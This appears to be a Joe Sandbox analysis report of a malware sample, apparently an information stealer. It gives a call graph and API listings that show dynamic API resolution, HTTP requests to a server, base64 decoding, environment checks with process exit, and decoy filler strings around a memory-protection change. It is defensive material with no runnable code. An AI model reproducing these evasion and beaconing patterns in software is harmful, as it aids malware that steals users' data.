38124->38125 38126 97379e 38125->38126 38127 974610 2 API calls 38126->38127 38128 9737b7 38127->38128 38129 974610 2 API calls 38128->38129 38130 9737d0 38129->38130 38131 974610 2 API calls 38130->38131 38132 9737e9 38131->38132 38133 974610 2 API calls 38132->38133 38134 973802 38133->38134 38135 974610 2 API calls 38134->38135 38136 97381b 38135->38136 38137 974610 2 API calls 38136->38137 38138 973834 38137->38138 38139 974610 2 API calls 38138->38139 38140 97384d 38139->38140 38141 974610 2 API calls 38140->38141 38142 973866 38141->38142 38143 974610 2 API calls 38142->38143 38144 97387f 38143->38144 38145 974610 2 API calls 38144->38145 38146 973898 38145->38146 38147 974610 2 API calls 38146->38147 38148 9738b1 38147->38148 38149 974610 2 API calls 38148->38149 38150 9738ca 38149->38150 38151 974610 2 API calls 38150->38151 38152 9738e3 38151->38152 38153 974610 2 API calls 38152->38153 38154 9738fc 38153->38154 38155 974610 2 API calls 38154->38155 38156 973915 38155->38156 38157 974610 2 API calls 38156->38157 38158 97392e 38157->38158 38159 974610 2 API calls 38158->38159 38160 973947 38159->38160 38161 974610 2 API calls 38160->38161 38162 973960 38161->38162 38163 974610 2 API calls 38162->38163 38164 973979 38163->38164 38165 974610 2 API calls 38164->38165 38166 973992 38165->38166 38167 974610 2 API calls 38166->38167 38168 9739ab 38167->38168 38169 974610 2 API calls 38168->38169 38170 9739c4 38169->38170 38171 974610 2 API calls 38170->38171 38172 9739dd 38171->38172 38173 974610 2 API calls 38172->38173 38174 9739f6 38173->38174 38175 974610 2 API calls 38174->38175 38176 973a0f 38175->38176 38177 974610 2 API calls 38176->38177 38178 973a28 38177->38178 38179 974610 2 API calls 38178->38179 38180 973a41 38179->38180 38181 974610 2 API calls 38180->38181 38182 973a5a 38181->38182 38183 974610 2 API calls 38182->38183 38184 973a73 38183->38184 38185 974610 2 API calls 38184->38185 38186 973a8c 38185->38186 38187 974610 2 API calls 38186->38187 
38188 973aa5 38187->38188 38189 974610 2 API calls 38188->38189 38190 973abe 38189->38190 38191 974610 2 API calls 38190->38191 38192 973ad7 38191->38192 38193 974610 2 API calls 38192->38193 38194 973af0 38193->38194 38195 974610 2 API calls 38194->38195 38196 973b09 38195->38196 38197 974610 2 API calls 38196->38197 38198 973b22 38197->38198 38199 974610 2 API calls 38198->38199 38200 973b3b 38199->38200 38201 974610 2 API calls 38200->38201 38202 973b54 38201->38202 38203 974610 2 API calls 38202->38203 38204 973b6d 38203->38204 38205 974610 2 API calls 38204->38205 38206 973b86 38205->38206 38207 974610 2 API calls 38206->38207 38208 973b9f 38207->38208 38209 974610 2 API calls 38208->38209 38210 973bb8 38209->38210 38211 974610 2 API calls 38210->38211 38212 973bd1 38211->38212 38213 974610 2 API calls 38212->38213 38214 973bea 38213->38214 38215 974610 2 API calls 38214->38215 38216 973c03 38215->38216 38217 974610 2 API calls 38216->38217 38218 973c1c 38217->38218 38219 974610 2 API calls 38218->38219 38220 973c35 38219->38220 38221 974610 2 API calls 38220->38221 38222 973c4e 38221->38222 38223 974610 2 API calls 38222->38223 38224 973c67 38223->38224 38225 974610 2 API calls 38224->38225 38226 973c80 38225->38226 38227 974610 2 API calls 38226->38227 38228 973c99 38227->38228 38229 974610 2 API calls 38228->38229 38230 973cb2 38229->38230 38231 974610 2 API calls 38230->38231 38232 973ccb 38231->38232 38233 974610 2 API calls 38232->38233 38234 973ce4 38233->38234 38235 974610 2 API calls 38234->38235 38236 973cfd 38235->38236 38237 974610 2 API calls 38236->38237 38238 973d16 38237->38238 38239 974610 2 API calls 38238->38239 38240 973d2f 38239->38240 38241 974610 2 API calls 38240->38241 38242 973d48 38241->38242 38243 974610 2 API calls 38242->38243 38244 973d61 38243->38244 38245 974610 2 API calls 38244->38245 38246 973d7a 38245->38246 38247 974610 2 API calls 38246->38247 38248 973d93 38247->38248 38249 974610 2 API calls 38248->38249 38250 973dac 
38249->38250 38251 974610 2 API calls 38250->38251 38252 973dc5 38251->38252 38253 974610 2 API calls 38252->38253 38254 973dde 38253->38254 38255 974610 2 API calls 38254->38255 38256 973df7 38255->38256 38257 974610 2 API calls 38256->38257 38258 973e10 38257->38258 38259 974610 2 API calls 38258->38259 38260 973e29 38259->38260 38261 974610 2 API calls 38260->38261 38262 973e42 38261->38262 38263 974610 2 API calls 38262->38263 38264 973e5b 38263->38264 38265 974610 2 API calls 38264->38265 38266 973e74 38265->38266 38267 974610 2 API calls 38266->38267 38268 973e8d 38267->38268 38269 974610 2 API calls 38268->38269 38270 973ea6 38269->38270 38271 974610 2 API calls 38270->38271 38272 973ebf 38271->38272 38273 974610 2 API calls 38272->38273 38274 973ed8 38273->38274 38275 974610 2 API calls 38274->38275 38276 973ef1 38275->38276 38277 974610 2 API calls 38276->38277 38278 973f0a 38277->38278 38279 974610 2 API calls 38278->38279 38280 973f23 38279->38280 38281 974610 2 API calls 38280->38281 38282 973f3c 38281->38282 38283 974610 2 API calls 38282->38283 38284 973f55 38283->38284 38285 974610 2 API calls 38284->38285 38286 973f6e 38285->38286 38287 974610 2 API calls 38286->38287 38288 973f87 38287->38288 38289 974610 2 API calls 38288->38289 38290 973fa0 38289->38290 38291 974610 2 API calls 38290->38291 38292 973fb9 38291->38292 38293 974610 2 API calls 38292->38293 38294 973fd2 38293->38294 38295 974610 2 API calls 38294->38295 38296 973feb 38295->38296 38297 974610 2 API calls 38296->38297 38298 974004 38297->38298 38299 974610 2 API calls 38298->38299 38300 97401d 38299->38300 38301 974610 2 API calls 38300->38301 38302 974036 38301->38302 38303 974610 2 API calls 38302->38303 38304 97404f 38303->38304 38305 974610 2 API calls 38304->38305 38306 974068 38305->38306 38307 974610 2 API calls 38306->38307 38308 974081 38307->38308 38309 974610 2 API calls 38308->38309 38310 97409a 38309->38310 38311 974610 2 API calls 38310->38311 38312 9740b3 38311->38312 
38313 974610 2 API calls 38312->38313 38314 9740cc 38313->38314 38315 974610 2 API calls 38314->38315 38316 9740e5 38315->38316 38317 974610 2 API calls 38316->38317 38318 9740fe 38317->38318 38319 974610 2 API calls 38318->38319 38320 974117 38319->38320 38321 974610 2 API calls 38320->38321 38322 974130 38321->38322 38323 974610 2 API calls 38322->38323 38324 974149 38323->38324 38325 974610 2 API calls 38324->38325 38326 974162 38325->38326 38327 974610 2 API calls 38326->38327 38328 97417b 38327->38328 38329 974610 2 API calls 38328->38329 38330 974194 38329->38330 38331 974610 2 API calls 38330->38331 38332 9741ad 38331->38332 38333 974610 2 API calls 38332->38333 38334 9741c6 38333->38334 38335 974610 2 API calls 38334->38335 38336 9741df 38335->38336 38337 974610 2 API calls 38336->38337 38338 9741f8 38337->38338 38339 974610 2 API calls 38338->38339 38340 974211 38339->38340 38341 974610 2 API calls 38340->38341 38342 97422a 38341->38342 38343 974610 2 API calls 38342->38343 38344 974243 38343->38344 38345 974610 2 API calls 38344->38345 38346 97425c 38345->38346 38347 974610 2 API calls 38346->38347 38348 974275 38347->38348 38349 974610 2 API calls 38348->38349 38350 97428e 38349->38350 38351 974610 2 API calls 38350->38351 38352 9742a7 38351->38352 38353 974610 2 API calls 38352->38353 38354 9742c0 38353->38354 38355 974610 2 API calls 38354->38355 38356 9742d9 38355->38356 38357 974610 2 API calls 38356->38357 38358 9742f2 38357->38358 38359 974610 2 API calls 38358->38359 38360 97430b 38359->38360 38361 974610 2 API calls 38360->38361 38362 974324 38361->38362 38363 974610 2 API calls 38362->38363 38364 97433d 38363->38364 38365 974610 2 API calls 38364->38365 38366 974356 38365->38366 38367 974610 2 API calls 38366->38367 38368 97436f 38367->38368 38369 974610 2 API calls 38368->38369 38370 974388 38369->38370 38371 974610 2 API calls 38370->38371 38372 9743a1 38371->38372 38373 974610 2 API calls 38372->38373 38374 9743ba 38373->38374 38375 974610 2 
API calls 38374->38375 38376 9743d3 38375->38376 38377 974610 2 API calls 38376->38377 38378 9743ec 38377->38378 38379 974610 2 API calls 38378->38379 38380 974405 38379->38380 38381 974610 2 API calls 38380->38381 38382 97441e 38381->38382 38383 974610 2 API calls 38382->38383 38384 974437 38383->38384 38385 974610 2 API calls 38384->38385 38386 974450 38385->38386 38387 974610 2 API calls 38386->38387 38388 974469 38387->38388 38389 974610 2 API calls 38388->38389 38390 974482 38389->38390 38391 974610 2 API calls 38390->38391 38392 97449b 38391->38392 38393 974610 2 API calls 38392->38393 38394 9744b4 38393->38394 38395 974610 2 API calls 38394->38395 38396 9744cd 38395->38396 38397 974610 2 API calls 38396->38397 38398 9744e6 38397->38398 38399 974610 2 API calls 38398->38399 38400 9744ff 38399->38400 38401 974610 2 API calls 38400->38401 38402 974518 38401->38402 38403 974610 2 API calls 38402->38403 38404 974531 38403->38404 38405 974610 2 API calls 38404->38405 38406 97454a 38405->38406 38407 974610 2 API calls 38406->38407 38408 974563 38407->38408 38409 974610 2 API calls 38408->38409 38410 97457c 38409->38410 38411 974610 2 API calls 38410->38411 38412 974595 38411->38412 38413 974610 2 API calls 38412->38413 38414 9745ae 38413->38414 38415 974610 2 API calls 38414->38415 38416 9745c7 38415->38416 38417 974610 2 API calls 38416->38417 38418 9745e0 38417->38418 38419 974610 2 API calls 38418->38419 38420 9745f9 38419->38420 38421 989f20 38420->38421 38422 989f30 43 API calls 38421->38422 38423 98a346 8 API calls 38421->38423 38422->38423 38424 98a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38423->38424 38425 98a456 38423->38425 38424->38425 38426 98a463 8 API calls 38425->38426 38427 98a526 38425->38427 38426->38427 38428 98a5a8 38427->38428 38429 98a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38427->38429 38430 98a5b5 6 API calls 38428->38430 38431 98a647 38428->38431 38429->38428 
38430->38431 38432 98a72f 38431->38432 38433 98a654 9 API calls 38431->38433 38434 98a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38432->38434 38435 98a7b2 38432->38435 38433->38432 38434->38435 38436 98a7bb GetProcAddress GetProcAddress 38435->38436 38437 98a7ec 38435->38437 38436->38437 38438 98a825 38437->38438 38439 98a7f5 GetProcAddress GetProcAddress 38437->38439 38440 98a922 38438->38440 38441 98a832 10 API calls 38438->38441 38439->38438 38442 98a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38440->38442 38443 98a98d 38440->38443 38441->38440 38442->38443 38444 98a9ae 38443->38444 38445 98a996 GetProcAddress 38443->38445 38446 985ef3 38444->38446 38447 98a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38444->38447 38445->38444 38448 971590 38446->38448 38447->38446 38718 9716b0 38448->38718 38451 98aab0 lstrcpy 38452 9715b5 38451->38452 38453 98aab0 lstrcpy 38452->38453 38454 9715c7 38453->38454 38455 98aab0 lstrcpy 38454->38455 38456 9715d9 38455->38456 38457 98aab0 lstrcpy 38456->38457 38458 971663 38457->38458 38459 985760 38458->38459 38460 985771 38459->38460 38461 98ab30 2 API calls 38460->38461 38462 98577e 38461->38462 38463 98ab30 2 API calls 38462->38463 38464 98578b 38463->38464 38465 98ab30 2 API calls 38464->38465 38466 985798 38465->38466 38467 98aa50 lstrcpy 38466->38467 38468 9857a5 38467->38468 38469 98aa50 lstrcpy 38468->38469 38470 9857b2 38469->38470 38471 98aa50 lstrcpy 38470->38471 38472 9857bf 38471->38472 38473 98aa50 lstrcpy 38472->38473 38494 9857cc 38473->38494 38474 98aa50 lstrcpy 38474->38494 38475 98ab30 lstrlen lstrcpy 38475->38494 38476 985893 StrCmpCA 38476->38494 38477 9858f0 StrCmpCA 38478 985a2c 38477->38478 38477->38494 38479 98abb0 lstrcpy 38478->38479 38480 985a38 38479->38480 38481 98ab30 2 API calls 38480->38481 38482 985a46 38481->38482 38485 98ab30 2 API calls 38482->38485 38483 985aa6 StrCmpCA 38486 985be1 38483->38486 38483->38494 38484 985440 
20 API calls 38484->38494 38487 985a55 38485->38487 38488 98abb0 lstrcpy 38486->38488 38489 9716b0 lstrcpy 38487->38489 38490 985bed 38488->38490 38512 985a61 38489->38512 38491 98ab30 2 API calls 38490->38491 38492 985bfb 38491->38492 38496 98ab30 2 API calls 38492->38496 38493 985c5b StrCmpCA 38497 985c78 38493->38497 38498 985c66 Sleep 38493->38498 38494->38474 38494->38475 38494->38476 38494->38477 38494->38483 38494->38484 38494->38493 38495 985510 25 API calls 38494->38495 38506 9859da StrCmpCA 38494->38506 38509 98aab0 lstrcpy 38494->38509 38510 985b8f StrCmpCA 38494->38510 38511 98abb0 lstrcpy 38494->38511 38513 971590 lstrcpy 38494->38513 38495->38494 38499 985c0a 38496->38499 38500 98abb0 lstrcpy 38497->38500 38498->38494 38501 9716b0 lstrcpy 38499->38501 38502 985c84 38500->38502 38501->38512 38503 98ab30 2 API calls 38502->38503 38504 985c93 38503->38504 38505 98ab30 2 API calls 38504->38505 38507 985ca2 38505->38507 38506->38494 38508 9716b0 lstrcpy 38507->38508 38508->38512 38509->38494 38510->38494 38511->38494 38512->37566 38513->38494 38515 9876dc 38514->38515 38516 9876e3 GetVolumeInformationA 38514->38516 38515->38516 38517 987721 38516->38517 38518 98778c GetProcessHeap RtlAllocateHeap 38517->38518 38519 9877b8 wsprintfA 38518->38519 38520 9877a9 38518->38520 38522 98aa50 lstrcpy 38519->38522 38521 98aa50 lstrcpy 38520->38521 38523 985ff7 38521->38523 38522->38523 38523->37587 38525 98aab0 lstrcpy 38524->38525 38526 9748e9 38525->38526 38727 974800 38526->38727 38528 9748f5 38529 98aa50 lstrcpy 38528->38529 38530 974927 38529->38530 38531 98aa50 lstrcpy 38530->38531 38532 974934 38531->38532 38533 98aa50 lstrcpy 38532->38533 38534 974941 38533->38534 38535 98aa50 lstrcpy 38534->38535 38536 97494e 38535->38536 38537 98aa50 lstrcpy 38536->38537 38538 97495b InternetOpenA StrCmpCA 38537->38538 38539 974994 38538->38539 38540 974f1b InternetCloseHandle 38539->38540 38733 988cf0 38539->38733 38542 974f38 38540->38542 38748 97a210 CryptStringToBinaryA 
38542->38748 38543 9749b3 38741 98ac30 38543->38741 38547 9749c6 38548 98abb0 lstrcpy 38547->38548 38553 9749cf 38548->38553 38549 98ab30 2 API calls 38550 974f55 38549->38550 38551 98acc0 4 API calls 38550->38551 38554 974f6b 38551->38554 38552 974f77 codecvt 38556 98aab0 lstrcpy 38552->38556 38557 98acc0 4 API calls 38553->38557 38555 98abb0 lstrcpy 38554->38555 38555->38552 38569 974fa7 38556->38569 38558 9749f9 38557->38558 38559 98abb0 lstrcpy 38558->38559 38560 974a02 38559->38560 38561 98acc0 4 API calls 38560->38561 38562 974a21 38561->38562 38563 98abb0 lstrcpy 38562->38563 38564 974a2a 38563->38564 38565 98ac30 3 API calls 38564->38565 38566 974a48 38565->38566 38567 98abb0 lstrcpy 38566->38567 38568 974a51 38567->38568 38570 98acc0 4 API calls 38568->38570 38569->37590 38571 974a70 38570->38571 38572 98abb0 lstrcpy 38571->38572 38573 974a79 38572->38573 38574 98acc0 4 API calls 38573->38574 38575 974a98 38574->38575 38576 98abb0 lstrcpy 38575->38576 38577 974aa1 38576->38577 38578 98acc0 4 API calls 38577->38578 38579 974acd 38578->38579 38580 98ac30 3 API calls 38579->38580 38581 974ad4 38580->38581 38582 98abb0 lstrcpy 38581->38582 38583 974add 38582->38583 38584 974af3 InternetConnectA 38583->38584 38584->38540 38585 974b23 HttpOpenRequestA 38584->38585 38587 974f0e InternetCloseHandle 38585->38587 38588 974b78 38585->38588 38587->38540 38589 98acc0 4 API calls 38588->38589 38590 974b8c 38589->38590 38591 98abb0 lstrcpy 38590->38591 38592 974b95 38591->38592 38593 98ac30 3 API calls 38592->38593 38594 974bb3 38593->38594 38595 98abb0 lstrcpy 38594->38595 38596 974bbc 38595->38596 38597 98acc0 4 API calls 38596->38597 38598 974bdb 38597->38598 38599 98abb0 lstrcpy 38598->38599 38600 974be4 38599->38600 38601 98acc0 4 API calls 38600->38601 38602 974c05 38601->38602 38603 98abb0 lstrcpy 38602->38603 38604 974c0e 38603->38604 38605 98acc0 4 API calls 38604->38605 38606 974c2e 38605->38606 38607 98abb0 lstrcpy 38606->38607 38608 974c37 38607->38608 38609 
98acc0 4 API calls 38608->38609 38610 974c56 38609->38610 38611 98abb0 lstrcpy 38610->38611 38612 974c5f 38611->38612 38613 98ac30 3 API calls 38612->38613 38614 974c7d 38613->38614 38615 98abb0 lstrcpy 38614->38615 38616 974c86 38615->38616 38617 98acc0 4 API calls 38616->38617 38618 974ca5 38617->38618 38619 98abb0 lstrcpy 38618->38619 38620 974cae 38619->38620 38621 98acc0 4 API calls 38620->38621 38622 974ccd 38621->38622 38623 98abb0 lstrcpy 38622->38623 38624 974cd6 38623->38624 38625 98ac30 3 API calls 38624->38625 38626 974cf4 38625->38626 38627 98abb0 lstrcpy 38626->38627 38628 974cfd 38627->38628 38629 98acc0 4 API calls 38628->38629 38630 974d1c 38629->38630 38631 98abb0 lstrcpy 38630->38631 38632 974d25 38631->38632 38633 98acc0 4 API calls 38632->38633 38634 974d46 38633->38634 38635 98abb0 lstrcpy 38634->38635 38636 974d4f 38635->38636 38637 98acc0 4 API calls 38636->38637 38638 974d6f 38637->38638 38639 98abb0 lstrcpy 38638->38639 38640 974d78 38639->38640 38641 98acc0 4 API calls 38640->38641 38642 974d97 38641->38642 38643 98abb0 lstrcpy 38642->38643 38644 974da0 38643->38644 38645 98ac30 3 API calls 38644->38645 38646 974dbe 38645->38646 38647 98abb0 lstrcpy 38646->38647 38648 974dc7 38647->38648 38649 98aa50 lstrcpy 38648->38649 38650 974de2 38649->38650 38651 98ac30 3 API calls 38650->38651 38652 974e03 38651->38652 38653 98ac30 3 API calls 38652->38653 38654 974e0a 38653->38654 38655 98abb0 lstrcpy 38654->38655 38656 974e16 38655->38656 38657 974e37 lstrlen 38656->38657 38658 974e4a 38657->38658 38659 974e53 lstrlen 38658->38659 38747 98ade0 38659->38747 38661 974e63 HttpSendRequestA 38662 974e82 InternetReadFile 38661->38662 38663 974eb7 InternetCloseHandle 38662->38663 38668 974eae 38662->38668 38666 98ab10 38663->38666 38665 98acc0 4 API calls 38665->38668 38666->38587 38667 98abb0 lstrcpy 38667->38668 38668->38662 38668->38663 38668->38665 38668->38667 38754 98ade0 38669->38754 38671 981a14 StrCmpCA 38672 981a1f ExitProcess 38671->38672 
38674 981a27 38671->38674 38673 981c12 38673->37592 38674->38673 38675 981afd StrCmpCA 38674->38675 38676 981b1f StrCmpCA 38674->38676 38677 981aad StrCmpCA 38674->38677 38678 981acf StrCmpCA 38674->38678 38679 981bc0 StrCmpCA 38674->38679 38680 981b41 StrCmpCA 38674->38680 38681 981ba1 StrCmpCA 38674->38681 38682 981b82 StrCmpCA 38674->38682 38683 981b63 StrCmpCA 38674->38683 38684 98ab30 lstrlen lstrcpy 38674->38684 38675->38674 38676->38674 38677->38674 38678->38674 38679->38674 38680->38674 38681->38674 38682->38674 38683->38674 38684->38674 38685->37598 38686->37600 38687->37606 38688->37608 38689->37614 38690->37616 38691->37620 38692->37624 38693->37628 38694->37634 38695->37636 38696->37640 38697->37654 38698->37658 38699->37657 38700->37653 38701->37657 38702->37675 38703->37660 38704->37662 38705->37666 38706->37671 38707->37672 38708->37679 38709->37682 38710->37688 38711->37710 38712->37715 38713->37714 38714->37711 38715->37714 38716->37724 38719 98aab0 lstrcpy 38718->38719 38720 9716c3 38719->38720 38721 98aab0 lstrcpy 38720->38721 38722 9716d5 38721->38722 38723 98aab0 lstrcpy 38722->38723 38724 9716e7 38723->38724 38725 98aab0 lstrcpy 38724->38725 38726 9715a3 38725->38726 38726->38451 38728 974816 38727->38728 38729 974888 lstrlen 38728->38729 38753 98ade0 38729->38753 38731 974898 InternetCrackUrlA 38732 9748b7 38731->38732 38732->38528 38734 98aa50 lstrcpy 38733->38734 38735 988d04 38734->38735 38736 98aa50 lstrcpy 38735->38736 38737 988d12 GetSystemTime 38736->38737 38738 988d29 38737->38738 38739 98aab0 lstrcpy 38738->38739 38740 988d8c 38739->38740 38740->38543 38742 98ac41 38741->38742 38743 98ac98 38742->38743 38745 98ac78 lstrcpy lstrcat 38742->38745 38744 98aab0 lstrcpy 38743->38744 38746 98aca4 38744->38746 38745->38743 38746->38547 38747->38661 38749 974f3e 38748->38749 38750 97a249 LocalAlloc 38748->38750 38749->38549 38749->38552 38750->38749 38751 97a264 CryptStringToBinaryA 38750->38751 38751->38749 38752 97a289 LocalFree 
38751->38752 38752->38749 38753->38731 38754->38671

                                        Control-flow Graph

                                        APIs
                                        • GetProcAddress.KERNEL32(76210000,01811578), ref: 00989BF1
                                        • GetProcAddress.KERNEL32(76210000,018115D8), ref: 00989C0A
                                        • GetProcAddress.KERNEL32(76210000,018115A8), ref: 00989C22
                                        • GetProcAddress.KERNEL32(76210000,01811710), ref: 00989C3A
                                        • GetProcAddress.KERNEL32(76210000,018115C0), ref: 00989C53
                                        • GetProcAddress.KERNEL32(76210000,01818938), ref: 00989C6B
                                        • GetProcAddress.KERNEL32(76210000,01805628), ref: 00989C83
                                        • GetProcAddress.KERNEL32(76210000,018054C8), ref: 00989C9C
                                        • GetProcAddress.KERNEL32(76210000,01811638), ref: 00989CB4
                                        • GetProcAddress.KERNEL32(76210000,01811608), ref: 00989CCC
                                        • GetProcAddress.KERNEL32(76210000,01811740), ref: 00989CE5
                                        • GetProcAddress.KERNEL32(76210000,01811650), ref: 00989CFD
                                        • GetProcAddress.KERNEL32(76210000,018056A8), ref: 00989D15
                                        • GetProcAddress.KERNEL32(76210000,01811758), ref: 00989D2E
                                        • GetProcAddress.KERNEL32(76210000,01811770), ref: 00989D46
                                        • GetProcAddress.KERNEL32(76210000,018056C8), ref: 00989D5E
                                        • GetProcAddress.KERNEL32(76210000,01811668), ref: 00989D77
                                        • GetProcAddress.KERNEL32(76210000,01811680), ref: 00989D8F
                                        • GetProcAddress.KERNEL32(76210000,018054A8), ref: 00989DA7
                                        • GetProcAddress.KERNEL32(76210000,01811890), ref: 00989DC0
                                        • GetProcAddress.KERNEL32(76210000,01805368), ref: 00989DD8
                                        • LoadLibraryA.KERNEL32(01811878,?,00986CA0), ref: 00989DEA
                                        • LoadLibraryA.KERNEL32(018118A8,?,00986CA0), ref: 00989DFB
                                        • LoadLibraryA.KERNEL32(018117E8,?,00986CA0), ref: 00989E0D
                                        • LoadLibraryA.KERNEL32(01811860,?,00986CA0), ref: 00989E1F
                                        • LoadLibraryA.KERNEL32(01811800,?,00986CA0), ref: 00989E30
                                        • GetProcAddress.KERNEL32(75B30000,01811818), ref: 00989E52
                                        • GetProcAddress.KERNEL32(751E0000,01811830), ref: 00989E73
                                        • GetProcAddress.KERNEL32(751E0000,01811848), ref: 00989E8B
                                        • GetProcAddress.KERNEL32(76910000,01818F50), ref: 00989EAD
                                        • GetProcAddress.KERNEL32(75670000,01805408), ref: 00989ECE
                                        • GetProcAddress.KERNEL32(77310000,01818978), ref: 00989EEF
                                        • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00989F06
                                        Strings
                                        • NtQueryInformationProcess, xrefs: 00989EFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: NtQueryInformationProcess
                                        • API String ID: 2238633743-2781105232
                                        • Opcode ID: 452f2c57451ad78f6be7ef482fb2387e01eacaf5d7f9ed410dbcba912301e05d
                                        • Instruction ID: bfc293788cb41d0526da1a3b1ea43ff54ddd2e5729e2adf27af2bf286fc154e6
                                        • Opcode Fuzzy Hash: 452f2c57451ad78f6be7ef482fb2387e01eacaf5d7f9ed410dbcba912301e05d
                                        • Instruction Fuzzy Hash: 08A109BD608241DFC354DFA8EC88B5E7BA9B78F702710871AB90AC3274D7749944DBA1

                                        Control-flow Graph (graph image not reproduced; its legend marked basic blocks as Executed or Not Executed)
                                        control_flow_graph 764 974610-9746e5 RtlAllocateHeap 781 9746f0-9746f6 764->781 782 97479f-9747f9 VirtualProtect 781->782 783 9746fc-97479a 781->783 783->781
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0097465E
                                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 009747EC
                                        Strings
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746B2
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746A7
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097478F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974728
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974707
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097462D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974617
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009747C0
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974638
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097467D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974672
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009747AA
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097479F
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974643
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746FC
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974763
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746C8
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097476E
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974784
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0097471D
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974693
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009747CB
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009746D3
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009747B5
                                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00974622
